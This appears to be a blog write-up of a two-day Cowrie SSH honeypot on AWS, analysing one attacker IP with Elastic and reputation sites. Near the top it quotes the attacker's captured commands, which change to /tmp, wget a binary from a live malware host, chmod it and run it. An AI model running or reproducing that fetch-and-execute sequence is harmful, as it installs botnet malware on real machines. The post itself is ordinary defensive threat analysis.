The Two Day Cowrie Honeypot

I was tasked with starting up a honeypot using Amazon Web Services (AWS). I left the cowrie honeypot online for about two days and saved the info into my elastic dashboard for further threat analysis. One IP got my attention since the network host was FranTech Solutions.

___________________________________________________________________

Commands Used by IP (Repeated Three Times)

./x86_64 x86xhed

cat /etc/issue

cd /tmp/

wget http://194.85.249.86/x86_64

chmod 777 *

./x86_64 x86xhed

-Commands the attacker IP used-

___________________________________________________________________

Looking At What The Commands Do

For some reason the first command that is ran seems to be running a file that is not on the computer as of yet. I’ve tried running this file in the tmp folder which I’m assuming is where it’s supposed to be from the following commands.

Now for the next command, I didn’t know what it meant even after using it in the command line. I went on the internet and this is what I found. It seems that using the cat command on /etc/issue displays a welcome or/and warning line to ssh users when logging in.

The next command that is used is going to the tmp directory, to presumably download malware which is what is done.

The IP address of 194.85.249.86 is used as the web browser using the command wget which downloads content from web browsers.

After the file is downloaded, the permissions are changed to allow read, write and execute access to all users. After that, the command is then executed.

___________________________________________________________________

What I Found Researching the Attackers IP

For this next section I will display the information I found on this IP through various websites which I will of course provide the URLs for. I first started off with the research of the attackers IP.

Clicking on the IP address in the dashboard brought me to this information page which gave me the origins of this IP. The location of the IP is in Las Vegas, United States. The network owner of this IP is FranTech Solutions which has some history hosting malware like the one I’ve encountered. The email reputation is poor, so from that I can assume emails from this IP are usually meant to harm the receiver.

-Locational and network owner for attack IP-

The location data coming from Las Vegas make sense. Las Vegas is a very good place to host data servers, from what the web says “Las Vegas is the #1 Safest City From Natural Disasters in the USA”.

-IPs on the same subnet-
-Blocklist from the dashboard-
-The website is abuseipdb-

This was a nice find for me because this in the beginning solidified that this was a dangerous IP, which of course is expected. Still, having solid evidence like this is great.

-Went to a website called VirusTotal and it gave me evidence that this IP was malware-
-Brightcloud threat analysis-

Brightcloud gave me confirmation that this IP was trying to host a botnet which is typical for a honeypot. Though this was expected, its still good to have backing evidence.

-A line and bar graph of attacks from IP-
-Ports and reaffirmed location data, this also shows this IP was using SSH-
-The location of where the attacks generalize-

From the information above it shows that the attacks are coming from the middle of California. This is actually very near the network host location, which is Las Vegas.

-Usernames and passwords used-

This screenshot was taken from the dashboard section of Elastic. It shows the usernames and passwords used by the attacker IP to try and login to the honeypot, which all lead to failure. The bigger the credential means the more the attacker tried it. As you can see “root” as the username was used the most because if they somehow logged in as root they would have access to just about everything.

-Blacklist status from the website Ipvoid-

This site is called ipvoid.com. This website lets you input an IP address to look up and then display details in this table format. The blacklist status says that it is 20/115, the blacklist coming from DNS-based blacklist (DNSBL).

___________________________________________________________________

What I Found From the Wget IP

This is the information that I found while doing some research on the IP that I found in the command line.

-A reminder of the command-
-Using virustotal again, I found three alerts labeling this IP as malware-
-Additional information from abuseipdb-
-IPs on the same subnet-
-Locational and network owner-

This screenshot shows the related host and IP. This has more poor email reputation status which isn’t too surprising considering this is used as malware in the wget command. Strangely enough this IP draws its origins from Germany of all places. I’d think it would originate from the US because that’s where the host is.

-Using the website brightcloud showed there was no threat-

Using the website brightcloud showed me strangely enough that there is no threat found on the wget IP, despite other sources saying that this IP is in fact dangerous.

-Blacklist status data from Ipvoid-

From using the same website as before I was able to see that this IP (unsurprisingly) is blacklisted. Not as many blacklists as the previous query, but blacklisted nonetheless.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store